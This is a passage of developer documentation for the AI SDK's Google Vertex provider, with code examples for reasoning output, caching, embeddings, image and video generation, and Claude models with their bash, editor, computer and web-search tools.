} satisfies GoogleLanguageModelOptions,
},
prompt: 'Explain quantum computing in simple terms.',
});
for await (const part of result.fullStream) {
  if (part.type === 'reasoning-delta') {
    process.stdout.write(`THOUGHT: ${part.text}\n`);
  } else if (part.type === 'text-delta') {
    process.stdout.write(part.text);
  }
}
When includeThoughts is true, parts of the API response marked with thought: true will be processed as reasoning.
- In
generateText, these contribute to thereasoningText(string) andreasoning(array) fields. - In
streamText, these are emitted asreasoningstream parts.
File Inputs
The Google Vertex provider supports file inputs, e.g. PDF files.
import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';
import fs from 'node:fs';
const { text } = await generateText({
model: vertex('gemini-2.5-pro'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model according to this document?',
},
{
type: 'file',
data: fs.readFileSync('./data/ai.pdf'),
mediaType: 'application/pdf',
},
],
},
],
});
See File Parts for details on how to use files in prompts.
Cached Content
Google Vertex AI supports both explicit and implicit caching to help reduce costs on repetitive content.
Implicit Caching
import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';
// Structure prompts with consistent content at the beginning
const baseContext =
'You are a cooking assistant with expertise in Italian cuisine. Here are 1000 lasagna recipes for reference...';
const { text: veggieLasagna } = await generateText({
model: vertex('gemini-2.5-pro'),
prompt: `${baseContext}\n\nWrite a vegetarian lasagna recipe for 4 people.`,
});
// Second request with same prefix - eligible for cache hit
const { text: meatLasagna, providerMetadata } = await generateText({
model: vertex('gemini-2.5-pro'),
prompt: `${baseContext}\n\nWrite a meat lasagna recipe for 12 people.`,
});
// Check cached token count in usage metadata
console.log('Cached tokens:', providerMetadata.vertex);
// e.g.
// {
// groundingMetadata: null,
// safetyRatings: null,
// usageMetadata: {
// cachedContentTokenCount: 2027,
// thoughtsTokenCount: 702,
// promptTokenCount: 2152,
// candidatesTokenCount: 710,
// totalTokenCount: 3564
// }
// }
Explicit Caching
You can use explicit caching with Gemini models. See the Vertex AI context caching documentation to check if caching is supported for your model.
First, create a cache using the Google GenAI SDK with Vertex mode enabled:
import { GoogleGenAI } from '@google/genai';
const ai = new GoogleGenAI({
vertexai: true,
project: process.env.GOOGLE_VERTEX_PROJECT,
location: process.env.GOOGLE_VERTEX_LOCATION,
});
const model = 'gemini-2.5-pro';
// Create a cache with the content you want to reuse
const cache = await ai.caches.create({
model,
config: {
contents: [
{
role: 'user',
parts: [{ text: '1000 Lasagna Recipes...' }],
},
],
ttl: '300s', // Cache expires after 5 minutes
},
});
console.log('Cache created:', cache.name);
// e.g. projects/my-project/locations/us-central1/cachedContents/abc123
Then use the cache with the AI SDK:
import { vertex } from '@ai-sdk/google-vertex';
import { type GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text: veggieLasagnaRecipe } = await generateText({
model: vertex('gemini-2.5-pro'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
providerOptions: {
vertex: {
cachedContent: cache.name,
} satisfies GoogleLanguageModelOptions,
},
});
const { text: meatLasagnaRecipe } = await generateText({
model: vertex('gemini-2.5-pro'),
prompt: 'Write a meat lasagna recipe for 12 people.',
providerOptions: {
vertex: {
cachedContent: cache.name,
} satisfies GoogleLanguageModelOptions,
},
});
Safety Ratings
The safety ratings provide insight into the safety of the model's response. See Google Vertex AI documentation on configuring safety filters.
Example response excerpt:
{
"safetyRatings": [
{
"category": "HARM_CATEGORY_HATE_SPEECH",
"probability": "NEGLIGIBLE",
"probabilityScore": 0.11027937,
"severity": "HARM_SEVERITY_LOW",
"severityScore": 0.28487435
},
{
"category": "HARM_CATEGORY_DANGEROUS_CONTENT",
"probability": "HIGH",
"blocked": true,
"probabilityScore": 0.95422274,
"severity": "HARM_SEVERITY_MEDIUM",
"severityScore": 0.43398145
},
{
"category": "HARM_CATEGORY_HARASSMENT",
"probability": "NEGLIGIBLE",
"probabilityScore": 0.11085559,
"severity": "HARM_SEVERITY_NEGLIGIBLE",
"severityScore": 0.19027223
},
{
"category": "HARM_CATEGORY_SEXUALLY_EXPLICIT",
"probability": "NEGLIGIBLE",
"probabilityScore": 0.22901751,
"severity": "HARM_SEVERITY_NEGLIGIBLE",
"severityScore": 0.09089675
}
]
}
For more details, see the Google Vertex AI documentation on grounding with Google Search.
Troubleshooting
Schema Limitations
The Google Vertex API uses a subset of the OpenAPI 3.0 schema, which does not support features such as unions. The errors that you get in this case look like this:
GenerateContentRequest.generation_config.response_schema.properties[occupation].type: must be specified
By default, structured outputs are enabled (and for tool calling they are required). You can disable structured outputs for object generation as a workaround:
import { vertex } from '@ai-sdk/google-vertex';
import { type GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText, Output } from 'ai';
import { z } from 'zod';
const result = await generateText({
model: vertex('gemini-2.5-pro'),
providerOptions: {
vertex: {
structuredOutputs: false,
} satisfies GoogleLanguageModelOptions,
},
output: Output.object({
schema: z.object({
name: z.string(),
age: z.number(),
contact: z.union([
z.object({
type: z.literal('email'),
value: z.string(),
}),
z.object({
type: z.literal('phone'),
value: z.string(),
}),
]),
}),
}),
prompt: 'Generate an example person for testing.',
});
The following Zod features are known not to work with Google Vertex:
- `z.union`
- `z.record`
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| gemini-3-pro-preview | | | | |
| gemini-2.5-pro | | | | |
| gemini-2.5-flash | | | | |
| gemini-2.0-flash-001 | | | | |
Embedding Models
You can create models that call the Google Vertex AI embeddings API using the .embeddingModel() factory method:
const model = vertex.embeddingModel('text-embedding-005');
Google Vertex AI embedding models support additional settings. You can pass them as an options argument:
import {
vertex,
type GoogleVertexEmbeddingModelOptions,
} from '@ai-sdk/google-vertex';
import { embed } from 'ai';
const model = vertex.embeddingModel('text-embedding-005');
const { embedding } = await embed({
model,
value: 'sunny day at the beach',
providerOptions: {
vertex: {
outputDimensionality: 512, // optional, number of dimensions for the embedding
taskType: 'SEMANTIC_SIMILARITY', // optional, specifies the task type for generating embeddings
autoTruncate: false, // optional
} satisfies GoogleVertexEmbeddingModelOptions,
},
});
The following optional provider options are available for Google Vertex AI embedding models:
- `outputDimensionality`: number
  Optional reduced dimension for the output embedding. If set, excessive values in the output embedding are truncated from the end.
- `taskType`: string
  Optional. Specifies the task type for generating embeddings. Supported task types include:
  - `SEMANTIC_SIMILARITY`: Optimized for text similarity.
  - `CLASSIFICATION`: Optimized for text classification.
  - `CLUSTERING`: Optimized for clustering texts based on similarity.
  - `RETRIEVAL_DOCUMENT`: Optimized for document retrieval.
  - `RETRIEVAL_QUERY`: Optimized for query-based retrieval.
  - `QUESTION_ANSWERING`: Optimized for answering questions.
  - `FACT_VERIFICATION`: Optimized for verifying factual information.
  - `CODE_RETRIEVAL_QUERY`: Optimized for retrieving code blocks based on natural language queries.
- `title`: string
  Optional. The title of the document being embedded. This helps the model produce better embeddings by providing additional context. Only valid when `taskType` is set to `'RETRIEVAL_DOCUMENT'`.
- `autoTruncate`: boolean
  Optional. When set to `true`, input text will be truncated if it exceeds the maximum length. When set to `false`, an error is returned if the input text is too long. Defaults to `true`.
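For example, document embeddings can carry a title for extra context (a sketch combining the taskType and title options described above):
import {
  vertex,
  type GoogleVertexEmbeddingModelOptions,
} from '@ai-sdk/google-vertex';
import { embed } from 'ai';
// Sketch: embed a document chunk with a title to improve retrieval quality.
const { embedding } = await embed({
  model: vertex.embeddingModel('text-embedding-005'),
  value: 'Our product includes advanced AI capabilities and real-time processing.',
  providerOptions: {
    vertex: {
      taskType: 'RETRIEVAL_DOCUMENT',
      title: 'Product User Guide',
    } satisfies GoogleVertexEmbeddingModelOptions,
  },
});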
Model Capabilities
| Model | Max Values Per Call | Parallel Calls | Multimodal |
|---|---|---|---|
| text-embedding-005 | 2048 | | |
| gemini-embedding-2-preview | 2048 | | |
Image Models
You can create image models using the .image() factory method. The Google Vertex provider supports both Imagen and Gemini image models. For more on image generation with the AI SDK see generateImage().
Imagen Models
Imagen models generate images using the Imagen on Vertex AI API.
import { vertex } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: vertex.image('imagen-4.0-generate-001'),
prompt: 'A futuristic cityscape at sunset',
aspectRatio: '16:9',
});
Further configuration can be done using Google Vertex provider options. You can validate the provider options using the GoogleVertexImageModelOptions type.
import { vertex } from '@ai-sdk/google-vertex';
import { GoogleVertexImageModelOptions } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: vertex.image('imagen-4.0-generate-001'),
providerOptions: {
vertex: {
negativePrompt: 'pixelated, blurry, low-quality',
} satisfies GoogleVertexImageModelOptions,
},
// ...
});
The following provider options are available:
- `negativePrompt` string
  A description of what to discourage in the generated images.
- `personGeneration` `allow_adult` | `allow_all` | `dont_allow`
  Whether to allow person generation. Defaults to `allow_adult`.
- `safetySetting` `block_low_and_above` | `block_medium_and_above` | `block_only_high` | `block_none`
  Whether to block unsafe content. Defaults to `block_medium_and_above`.
- `addWatermark` boolean
  Whether to add an invisible watermark to the generated images. Defaults to `true`.
- `storageUri` string
  Cloud Storage URI to store the generated images.
Additional information about the images can be retrieved from the Google Vertex provider metadata.
import { vertex } from '@ai-sdk/google-vertex';
import { GoogleVertexImageModelOptions } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';
const { image, providerMetadata } = await generateImage({
model: vertex.image('imagen-4.0-generate-001'),
prompt: 'A futuristic cityscape at sunset',
aspectRatio: '16:9',
});
console.log(
`Revised prompt: ${providerMetadata.vertex.images[0].revisedPrompt}`,
);
Image Editing
Google Vertex Imagen models support image editing through inpainting, outpainting, and other edit modes. Pass input images via prompt.images and optionally a mask via prompt.mask.
Inpainting (Insert Objects)
Insert or replace objects in specific areas using a mask:
import { vertex, GoogleVertexImageModelOptions } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';
import fs from 'fs';
const image = fs.readFileSync('./input-image.png');
const mask = fs.readFileSync('./mask.png'); // White = edit area
const { images } = await generateImage({
model: vertex.image('imagen-3.0-capability-001'),
prompt: {
text: 'A sunlit indoor lounge area with a pool containing a flamingo',
images: [image],
mask,
},
providerOptions: {
vertex: {
edit: {
baseSteps: 50,
mode: 'EDIT_MODE_INPAINT_INSERTION',
maskMode: 'MASK_MODE_USER_PROVIDED',
maskDilation: 0.01,
},
} satisfies GoogleVertexImageModelOptions,
},
});
Outpainting (Extend Image)
Extend an image beyond its original boundaries:
import { vertex, GoogleVertexImageModelOptions } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';
import fs from 'fs';
const image = fs.readFileSync('./input-image.png');
const mask = fs.readFileSync('./outpaint-mask.png'); // White = extend area
const { images } = await generateImage({
model: vertex.image('imagen-3.0-capability-001'),
prompt: {
text: 'Extend the scene with more of the forest background',
images: [image],
mask,
},
providerOptions: {
vertex: {
edit: {
baseSteps: 50,
mode: 'EDIT_MODE_OUTPAINT',
maskMode: 'MASK_MODE_USER_PROVIDED',
},
} satisfies GoogleVertexImageModelOptions,
},
});
Edit Provider Options
The following options are available under providerOptions.vertex.edit:
- `mode` - The edit mode to use:
  - `EDIT_MODE_INPAINT_INSERTION` - Insert objects into masked areas
  - `EDIT_MODE_INPAINT_REMOVAL` - Remove objects from masked areas
  - `EDIT_MODE_OUTPAINT` - Extend image beyond boundaries
  - `EDIT_MODE_CONTROLLED_EDITING` - Controlled editing
  - `EDIT_MODE_PRODUCT_IMAGE` - Product image editing
  - `EDIT_MODE_BGSWAP` - Background swap
- `baseSteps` number - Number of sampling steps (35-75). Higher values = better quality but slower.
- `maskMode` - How to interpret the mask:
  - `MASK_MODE_USER_PROVIDED` - Use the provided mask directly
  - `MASK_MODE_DEFAULT` - Default mask mode
  - `MASK_MODE_DETECTION_BOX` - Mask from detected bounding boxes
  - `MASK_MODE_CLOTHING_AREA` - Mask from clothing segmentation
  - `MASK_MODE_PARSED_PERSON` - Mask from person parsing
- `maskDilation` number - Percentage (0-1) to grow the mask. Recommended: 0.01.
Imagen Model Capabilities
| Model | Aspect Ratios |
|---|---|
| imagen-3.0-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| imagen-3.0-generate-002 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| imagen-3.0-fast-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| imagen-4.0-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| imagen-4.0-fast-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| imagen-4.0-ultra-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
Gemini Image Models
Gemini image models (e.g. gemini-2.5-flash-image) are multimodal output language models that can be used with generateImage() for a simpler image generation experience. Internally, the provider calls the language model API with responseModalities: ['IMAGE'].
import { vertex } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: vertex.image('gemini-2.5-flash-image'),
prompt: 'A photorealistic image of a cat wearing a wizard hat',
aspectRatio: '1:1',
});
Gemini image models also support image editing by providing input images:
import { vertex } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';
import fs from 'node:fs';
const sourceImage = fs.readFileSync('./cat.png');
const { image } = await generateImage({
model: vertex.image('gemini-2.5-flash-image'),
prompt: {
text: 'Add a small wizard hat to this cat',
images: [sourceImage],
},
});
You can also use URLs (including gs:// Cloud Storage URIs) for input images:
import { vertex } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: vertex.image('gemini-2.5-flash-image'),
prompt: {
text: 'Add a small wizard hat to this cat',
images: ['https://example.com/cat.png'],
},
});
Gemini Image Model Capabilities
| Model | Image Generation | Image Editing | Aspect Ratios |
|---|---|---|---|
| gemini-3.1-flash-image-preview | | | 1:1, 2:3, 3:2, 3:4, 4:3, 4:5, 5:4, 9:16, 16:9, 21:9 |
| gemini-3-pro-image-preview | | | 1:1, 2:3, 3:2, 3:4, 4:3, 4:5, 5:4, 9:16, 16:9, 21:9 |
| gemini-2.5-flash-image | | | 1:1, 2:3, 3:2, 3:4, 4:3, 4:5, 5:4, 9:16, 16:9, 21:9 |
Video Models
You can create Veo video models that call the Vertex AI API
using the .video() factory method. For more on video generation with the AI SDK see generateVideo().
import { vertex } from '@ai-sdk/google-vertex';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: vertex.video('veo-3.1-generate-001'),
prompt:
'A pangolin curled on a mossy stone in a glowing bioluminescent forest',
aspectRatio: '16:9',
});
You can configure resolution and duration:
import { vertex } from '@ai-sdk/google-vertex';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: vertex.video('veo-3.1-generate-001'),
prompt: 'A serene mountain landscape at sunset',
aspectRatio: '16:9',
resolution: '1920x1080',
duration: 8,
});
Provider Options
Further configuration can be done using Google Vertex provider options. You can validate the provider options using the GoogleVertexVideoModelOptions type.
import { vertex } from '@ai-sdk/google-vertex';
import { GoogleVertexVideoModelOptions } from '@ai-sdk/google-vertex';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: vertex.video('veo-3.1-generate-001'),
prompt: 'A serene mountain landscape at sunset',
aspectRatio: '16:9',
providerOptions: {
vertex: {
generateAudio: true,
personGeneration: 'allow_adult',
} satisfies GoogleVertexVideoModelOptions,
},
});
The following provider options are available:
- `generateAudio` boolean
  Whether to generate audio along with the video.
- `personGeneration` `'dont_allow'` | `'allow_adult'` | `'allow_all'`
  Whether to allow person generation in the video.
- `negativePrompt` string
  A description of what to discourage in the generated video.
- `gcsOutputDirectory` string
  Cloud Storage URI to store the generated videos.
- `referenceImages` Array<{ bytesBase64Encoded?: string; gcsUri?: string }>
  Reference images for style or asset guidance.
- `pollIntervalMs` number
  Polling interval in milliseconds for checking task status.
- `pollTimeoutMs` number
  Maximum wait time in milliseconds for video generation.
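To persist a generated video, you can write its bytes to disk. A sketch, assuming the returned video exposes the same uint8Array field as other AI SDK generated files:
import { vertex } from '@ai-sdk/google-vertex';
import { experimental_generateVideo as generateVideo } from 'ai';
import fs from 'node:fs';
// Sketch: save the generated video. The uint8Array field is an assumption
// based on the AI SDK generated-file shape.
const { video } = await generateVideo({
  model: vertex.video('veo-3.1-generate-001'),
  prompt: 'A serene mountain landscape at sunset',
});
fs.writeFileSync('video.mp4', video.uint8Array);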
Model Capabilities
| Model | Audio Support |
|---|---|
| veo-3.1-generate-001 | Yes |
| veo-3.1-fast-generate-001 | Yes |
| veo-3.0-generate-001 | Yes |
| veo-3.0-fast-generate-001 | Yes |
| veo-2.0-generate-001 | No |
Google Vertex Anthropic Provider Usage
The Google Vertex Anthropic provider for the AI SDK offers support for Anthropic's Claude models through the Google Vertex AI APIs. This section provides details on how to set up and use the Google Vertex Anthropic provider.
Provider Instance
You can import the default provider instance vertexAnthropic from @ai-sdk/google-vertex/anthropic:
import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
If you need a customized setup, you can import createVertexAnthropic from @ai-sdk/google-vertex/anthropic and create a provider instance with your settings:
import { createVertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
const vertexAnthropic = createVertexAnthropic({
project: 'my-project', // optional
location: 'us-central1', // optional
});
Node.js Runtime
For Node.js environments, the Google Vertex Anthropic provider supports all standard Google Cloud authentication options through the google-auth-library. You can customize the authentication options by passing them to the createVertexAnthropic function:
import { createVertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
const vertexAnthropic = createVertexAnthropic({
googleAuthOptions: {
credentials: {
client_email: 'my-email',
private_key: 'my-private-key',
},
},
});
Optional Provider Settings
You can use the following optional settings to customize the Google Vertex Anthropic provider instance:
-
project string
The Google Cloud project ID that you want to use for the API calls. It uses the GOOGLE_VERTEX_PROJECT environment variable by default.
-
location string
The Google Cloud location that you want to use for the API calls, e.g. us-central1. It uses the GOOGLE_VERTEX_LOCATION environment variable by default.
-
googleAuthOptions object
Optional. The Authentication options used by the Google Auth Library. See also the GoogleAuthOptions interface.
-
authClient object An AuthClient to use.
-
keyFilename string Path to a .json, .pem, or .p12 key file.
-
keyFile string Path to a .json, .pem, or .p12 key file.
-
credentials object Object containing client_email and private_key properties, or the external account client options.
-
clientOptions object Options object passed to the constructor of the client.
-
scopes string | string[] Required scopes for the desired API request.
-
projectId string Your project ID.
-
universeDomain string The default service domain for a given Cloud universe.
-
headers Resolvable<Record<string, string | undefined>>
Headers to include in the requests. Can be provided in multiple formats:
- A record of header key-value pairs: Record<string, string | undefined>
- A function that returns headers: () => Record<string, string | undefined>
- An async function that returns headers: async () => Record<string, string | undefined>
- A promise that resolves to headers: Promise<Record<string, string | undefined>>
-
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation, e.g. for testing.
Edge Runtime
Edge runtimes (like Vercel Edge Functions and Cloudflare Workers) are lightweight JavaScript environments that run closer to users at the network edge. They only provide a subset of the standard Node.js APIs. For example, direct file system access is not available, and many Node.js-specific libraries (including the standard Google Auth library) are not compatible.
The Edge runtime version of the Google Vertex Anthropic provider supports Google's Application Default Credentials through environment variables. The values can be obtained from a json credentials file from the Google Cloud Console.
For Edge runtimes, you can import the provider instance from @ai-sdk/google-vertex/anthropic/edge:
import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic/edge';
To customize the setup, use createVertexAnthropic from the same module:
import { createVertexAnthropic } from '@ai-sdk/google-vertex/anthropic/edge';
const vertexAnthropic = createVertexAnthropic({
project: 'my-project', // optional
location: 'us-central1', // optional
});
For Edge runtime authentication, set these environment variables from your Google Default Application Credentials JSON file:
- GOOGLE_CLIENT_EMAIL
- GOOGLE_PRIVATE_KEY
- GOOGLE_PRIVATE_KEY_ID (optional)
Optional Provider Settings
You can use the following optional settings to customize the provider instance:
-
project string
The Google Cloud project ID that you want to use for the API calls. It uses the GOOGLE_VERTEX_PROJECT environment variable by default.
-
location string
The Google Cloud location that you want to use for the API calls, e.g. us-central1. It uses the GOOGLE_VERTEX_LOCATION environment variable by default.
-
googleCredentials object
Optional. The credentials used by the Edge provider for authentication. These credentials are typically set through environment variables and are derived from a service account JSON file.
-
clientEmail string The client email from the service account JSON file. Defaults to the contents of the GOOGLE_CLIENT_EMAIL environment variable.
-
privateKey string The private key from the service account JSON file. Defaults to the contents of the GOOGLE_PRIVATE_KEY environment variable.
-
privateKeyId string The private key ID from the service account JSON file (optional). Defaults to the contents of the GOOGLE_PRIVATE_KEY_ID environment variable.
-
headers Resolvable<Record<string, string | undefined>>
Headers to include in the requests. Can be provided in multiple formats:
- A record of header key-value pairs: Record<string, string | undefined>
- A function that returns headers: () => Record<string, string | undefined>
- An async function that returns headers: async () => Record<string, string | undefined>
- A promise that resolves to headers: Promise<Record<string, string | undefined>>
-
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation, e.g. for testing.
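As a sketch, the googleCredentials setting can also be passed explicitly instead of being read from environment variables; all values below are placeholders:
import { createVertexAnthropic } from '@ai-sdk/google-vertex/anthropic/edge';
const vertexAnthropic = createVertexAnthropic({
  project: 'my-project',
  location: 'us-central1',
  googleCredentials: {
    clientEmail: 'service-account@my-project.iam.gserviceaccount.com', // placeholder
    privateKey: '-----BEGIN PRIVATE KEY-----\n...', // placeholder
  },
});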
Language Models
You can create models that call the Anthropic Messages API using the provider instance.
The first argument is the model id, e.g. claude-3-haiku-20240307.
Some models have multi-modal capabilities.
const model = vertexAnthropic('claude-3-haiku-20240307');
You can use Anthropic language models to generate text with the generateText function:
import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
model: vertexAnthropic('claude-3-haiku-20240307'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Anthropic language models can also be used in the streamText function
and support structured data generation with Output
(see AI SDK Core).
The following optional provider options are available for Anthropic models:
-
sendReasoning boolean
Optional. Include reasoning content in requests sent to the model. Defaults to true. If you are experiencing issues with the model handling requests involving reasoning content, you can set this to false to omit them from the request.
-
thinking object
Optional. See the Reasoning section for more details.
-
metadata object
Optional. Metadata to include with the request. See the Anthropic API documentation for details.
- userId string - An external identifier for the end-user.
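A minimal sketch passing these options; the model id and metadata values are illustrative:
import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
  model: vertexAnthropic('claude-3-5-sonnet-v2@20241022'), // illustrative model id
  prompt: 'Summarize the plot of Hamlet in two sentences.',
  providerOptions: {
    anthropic: {
      sendReasoning: false, // omit reasoning content from the request
      metadata: { userId: 'user-123' }, // illustrative external user id
    },
  },
});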
Reasoning
Anthropic has reasoning support for the claude-3-7-sonnet@20250219 model.
You can enable it using the thinking provider option
and specifying a thinking budget in tokens.
import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { generateText } from 'ai';
const { text, reasoningText, reasoning } = await generateText({
model: vertexAnthropic('claude-3-7-sonnet@20250219'),
prompt: 'How many people will live in the world in 2040?',
providerOptions: {
anthropic: {
thinking: { type: 'enabled', budgetTokens: 12000 },
},
},
});
console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
console.log(text); // text response
See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.
Cache Control
In the messages and message parts, you can use the providerOptions property to set cache control breakpoints.
You need to set the anthropic property in the providerOptions object to { cacheControl: { type: 'ephemeral' } } to set a cache control breakpoint.
Cache read and cache write (creation) token counts are returned on the standard
usage object for both generateText and streamText. You can access them at
result.usage.inputTokenDetails.cacheReadTokens and
result.usage.inputTokenDetails.cacheWriteTokens.
import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { generateText } from 'ai';
const errorMessage = '... long error message ...';
const result = await generateText({
model: vertexAnthropic('claude-3-5-sonnet-20240620'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'You are a JavaScript expert.' },
{
type: 'text',
text: `Error message: ${errorMessage}`,
providerOptions: {
anthropic: { cacheControl: { type: 'ephemeral' } },
},
},
{ type: 'text', text: 'Explain the error message.' },
],
},
],
});
console.log(result.text);
console.log('Cache read tokens:', result.usage.inputTokenDetails.cacheReadTokens);
console.log(
'Cache write tokens:',
result.usage.inputTokenDetails.cacheWriteTokens,
);
You can also use cache control on system messages by providing multiple system messages at the head of your messages array:
const result = await generateText({
model: vertexAnthropic('claude-3-5-sonnet-20240620'),
messages: [
{
role: 'system',
content: 'Cached system message part',
providerOptions: {
anthropic: { cacheControl: { type: 'ephemeral' } },
},
},
{
role: 'system',
content: 'Uncached system message part',
},
{
role: 'user',
content: 'User prompt',
},
],
});
For more on prompt caching with Anthropic, see Google Vertex AI's Claude prompt caching documentation and Anthropic's Cache Control documentation.
Tools
Google Vertex Anthropic supports a subset of Anthropic's built-in tools. The following tools are available via the tools property of the provider instance:
- Bash Tool: Allows running bash commands.
- Text Editor Tool: Provides functionality for viewing and editing text files.
- Computer Tool: Enables control of keyboard and mouse actions on a computer.
- Web Search Tool: Provides access to real-time web content.
For more background on Anthropic tools, see Anthropic's documentation.
Bash Tool
The Bash Tool allows running bash commands. Here's how to create and use it:
const bashTool = vertexAnthropic.tools.bash_20250124({
execute: async ({ command, restart }) => {
// Implement your bash command execution logic here
// Return the result of the command execution
},
});
Parameters:
- command (string): The bash command to run. Required unless the tool is being restarted.
- restart (boolean, optional): Specifying true will restart this tool.
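As an illustrative sketch, the tool can then be passed to generateText like any other tool. The execSync-based executor below is a simplified placeholder that runs commands without sandboxing; the tool key and model id are assumptions:
import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { generateText, stepCountIs } from 'ai';
import { execSync } from 'node:child_process';

const bashTool = vertexAnthropic.tools.bash_20250124({
  // Placeholder executor: runs the command directly. In production,
  // sandbox and validate commands before executing them.
  execute: async ({ command }) => execSync(command).toString(),
});

const { text } = await generateText({
  model: vertexAnthropic('claude-3-5-sonnet-v2@20241022'), // illustrative model id
  prompt: 'List the files in the current directory.',
  tools: { bash: bashTool },
  stopWhen: stepCountIs(5),
});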
Text Editor Tool
The Text Editor Tool provides functionality for viewing and editing text files:
const textEditorTool = vertexAnthropic.tools.textEditor_20250124({
execute: async ({
command,
path,
file_text,
insert_line,
new_str,
insert_text,
old_str,
view_range,
}) => {
// Implement your text editing logic here
// Return the result of the text editing operation
},
});
Parameters:
- command ('view' | 'create' | 'str_replace' | 'insert' | 'undo_edit'): The command to run. Note: undo_edit is not supported in textEditor_20250429 and textEditor_20250728.
- path (string): Absolute path to file or directory, e.g. /repo/file.py or /repo.
- file_text (string, optional): Required for the create command, with the content of the file to be created.
- insert_line (number, optional): Required for the insert command. The line number after which to insert the new string.
- new_str (string, optional): New string for the str_replace command.
- insert_text (string, optional): Required for the insert command, containing the text to insert.
- old_str (string, optional): Required for the str_replace command, containing the string to replace.
- view_range (number[], optional): Optional for the view command to specify the line range to show.
- max_characters (number, optional): Optional maximum number of characters to view in the file (only available in textEditor_20250728).
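A sketch of wiring the textEditorTool defined above into a call; the str_replace_editor tool key and the model id are assumptions for illustration:
import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { generateText, stepCountIs } from 'ai';

const { text } = await generateText({
  model: vertexAnthropic('claude-3-5-sonnet-v2@20241022'), // illustrative model id
  prompt: 'View /repo/README.md and fix any typos you find.',
  tools: { str_replace_editor: textEditorTool }, // assumed tool key
  stopWhen: stepCountIs(5),
});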
Computer Tool
The Computer Tool enables control of keyboard and mouse actions on a computer:
const computerTool = vertexAnthropic.tools.computer_20241022({
displayWidthPx: 1920,
displayHeightPx: 1080,
displayNumber: 0, // Optional, for X11 environments
execute: async ({ action, coordinate, text }) => {
// Implement your computer control logic here
// Return the result of the action
// Example code:
switch (action) {
case 'screenshot': {
// multipart result:
return {
type: 'image',
data: fs
.readFileSync('./data/screenshot-editor.png')
.toString('base64'),
};
}
default: {
console.log('Action:', action);
console.log('Coordinate:', coordinate);
console.log('Text:', text);
return `executed ${action}`;
}
}
},
// map to tool result content for LLM consumption:
toModelOutput({ output }) {
return typeof output === 'string'
? [{ type: 'text', text: output }]
: [{ type: 'image', data: output.data, mediaType: 'image/png' }];
},
});
Parameters:
- action ('key' | 'type' | 'mouse_move' | 'left_click' | 'left_click_drag' | 'right_click' | 'middle_click' | 'double_click' | 'screenshot' | 'cursor_position'): The action to perform.
- coordinate (number[], optional): Required for mouse_move and left_click_drag actions. Specifies the (x, y) coordinates.
- text (string, optional): Required for type and key actions.
Web Search Tool
The Web Search Tool provides Claude with direct access to real-time web content:
const webSearchTool = vertexAnthropic.tools.webSearch_20250305({
maxUses: 5, // Optional: Maximum number of web searches Claude can perform
allowedDomains: ['example.com'], // Optional: Only search these domains
blockedDomains: ['spam.com'], // Optional: Never search these domains
userLocation: {
// Optional: Provide location for geographically relevant results
type: 'approximate',
city: 'San Francisco',
region: 'CA',
country: 'US',
timezone: 'America/Los_Angeles',
},
});
Parameters:
- maxUses (number, optional): Maximum number of web searches Claude can perform during the conversation.
- allowedDomains (string[], optional): Optional list of domains that Claude is allowed to search.
- blockedDomains (string[], optional): Optional list of domains that Claude should avoid when searching.
- userLocation (object, optional): Optional user location information to provide geographically relevant search results.
  - type ('approximate'): The type of location (must be approximate).
  - city (string, optional): The city name.
  - region (string, optional): The region or state.
  - country (string, optional): The country.
  - timezone (string, optional): The IANA timezone ID.
These tools can be used in conjunction with supported Claude models to enable more complex interactions and tasks.
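For example, a sketch using the webSearchTool defined above; the web_search tool key and the model id are assumptions:
import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { generateText, stepCountIs } from 'ai';

const { text } = await generateText({
  model: vertexAnthropic('claude-3-7-sonnet@20250219'), // illustrative model id
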